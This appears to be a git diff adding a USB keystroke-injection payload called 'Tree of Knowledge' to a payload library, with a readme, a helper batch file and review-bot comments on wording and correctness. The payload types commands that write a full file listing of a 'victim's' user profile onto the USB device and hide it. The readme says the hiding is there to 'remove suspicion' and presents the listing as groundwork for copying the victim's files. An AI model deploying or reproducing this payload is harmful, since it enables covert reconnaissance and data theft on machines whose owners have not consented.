diff --git a/library/payloads/recon/Tree_of_Knowledge/payload.txt b/library/payloads/recon/Tree_of_Knowledge/payload.txt new file mode 100644 index 0000000..9f1faca --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/payload.txt @@ -0,0 +1,13 @@ +REM Payload created by Alex007-CyberGuy +REM Check the readme.md file for more info on the payload and what is does. +DEFAULTDELAY 250 +DELAY 3000 +GUI r +DELAY 400 +STRING cmd /k "mode con:cols=18 lines=1&color FE&cd %userprofile%&for /f %d in ('wmic volume get driveletter^, label ^| findstr "USB"') do set myd=%d&echo tree /a /f > echotree.cmd" +ENTER +DELAY 350 +STRING echotree.cmd > %myd%/%computername%.txt&del echotree.cmd&attrib +h %myd%/%computername%.txt&exit +ENTER +ALT SPACE +STRING n \ No newline at end of file diff --git a/library/payloads/recon/Tree_of_Knowledge/readme.md b/library/payloads/recon/Tree_of_Knowledge/readme.md new file mode 100644 index 0000000..28b77dc --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/readme.md 
@@ -0,0 +1,26 @@ +# Tree of Knowledge + +## Intro +This payload copies the names of all the files on a victim's PC, then puts them on a file on the root of the ducky. +In order to remove suspicion, the ducky also automatically hides the gathered recon info so that it can only be seen when the batch file is run. +This whole process is relatively discreet, bug free and can run and finish in a matter of seconds. +This payload is great for the first phase of a Pen Test, since it effortlessly shows you the contents of a victim's PC, which can then later be used for an "involuntary backup". + +## Requirements: +- Only works on Windows (7/8/8.1/10) +- Twin Duck firmware must be loaded +- The ducky must be labeled as "USB" + +## Viewing files +In order to view the gathered recon file(s), simply put the show.bat program onto the root of the ducky and run it. + +## Troubleshooting +1. Experiment with those delays. +2. Make sure that you don't already have a recon file saved from that computer. +3. ALT SPACE doesn't work on some encoders. Try using the java based encoder. + +### Tip +The inject.bin still works even if it is marked as "hidden". + +That's it folks! +I spent quite long in order optimise this payload, so enjoy! diff --git a/library/payloads/recon/Tree_of_Knowledge/show.bat b/library/payloads/recon/Tree_of_Knowledge/show.bat new file mode 100644 index 0000000..d6bf5cd --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/show.bat @@ -0,0 +1,2 @@ +echo off: +attrib *.txt -h /s /d \ No newline at end of file
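Review bot: the second REM line of payload.txt has a typo (`what is does` should read `what it does`), and the header comments are the only place a reader learns what this key sequence leaves behind on the host, which they do not say: the commands visible in this hunk create and then delete `echotree.cmd` under `%userprofile%`, write a hidden `%computername%.txt` to whichever volume `wmic volume get driveletter, label` reports with label USB, and keep a `cmd /k` console open (only minimised by the trailing ALT SPACE / `n`) until `tree /a /f` finishes and `exit` runs. A REM line listing those artifacts would make the readme's "relatively discreet" claim checkable rather than asserted.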
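Review bot: the readme's Intro claims `bug free` and `can run and finish in a matter of seconds` are unsupported by anything in the patch (the run time is bounded by `tree /a /f` over the whole profile, which the readme never mentions), and the Requirements section is incomplete relative to the payload line: it lists the USB drive label and Twin Duck firmware but not that the host must have `wmic` and `tree` available, which the `for /f` loop in payload.txt depends on. Two wording fixes for the last paragraph: `in order optimise` is missing `to`, and `involuntary backup` in the Intro should be stated plainly as copying the victim's files so readers know what the second phase the readme alludes to actually is.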
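Review bot: `echo off:` on the first line of show.bat is not parsed as the echo-suppression command; cmd recognises only the exact words `on` and `off`, so with the trailing colon the line echoes text instead, and the conventional first line is `@echo off`. Second, `attrib *.txt -h /s /d` clears the hidden attribute from every `.txt` under the current directory and all subdirectories, not only the `%computername%.txt` files the payload writes, and the readme's statement that the recon file "can only be seen when the batch file is run" overstates what the hidden attribute does: `dir /a` or Explorer's show-hidden-files setting reveals it without this script, which is also how a defender inspecting the drive would find it. The file also lacks a trailing newline (`\ No newline at end of file`).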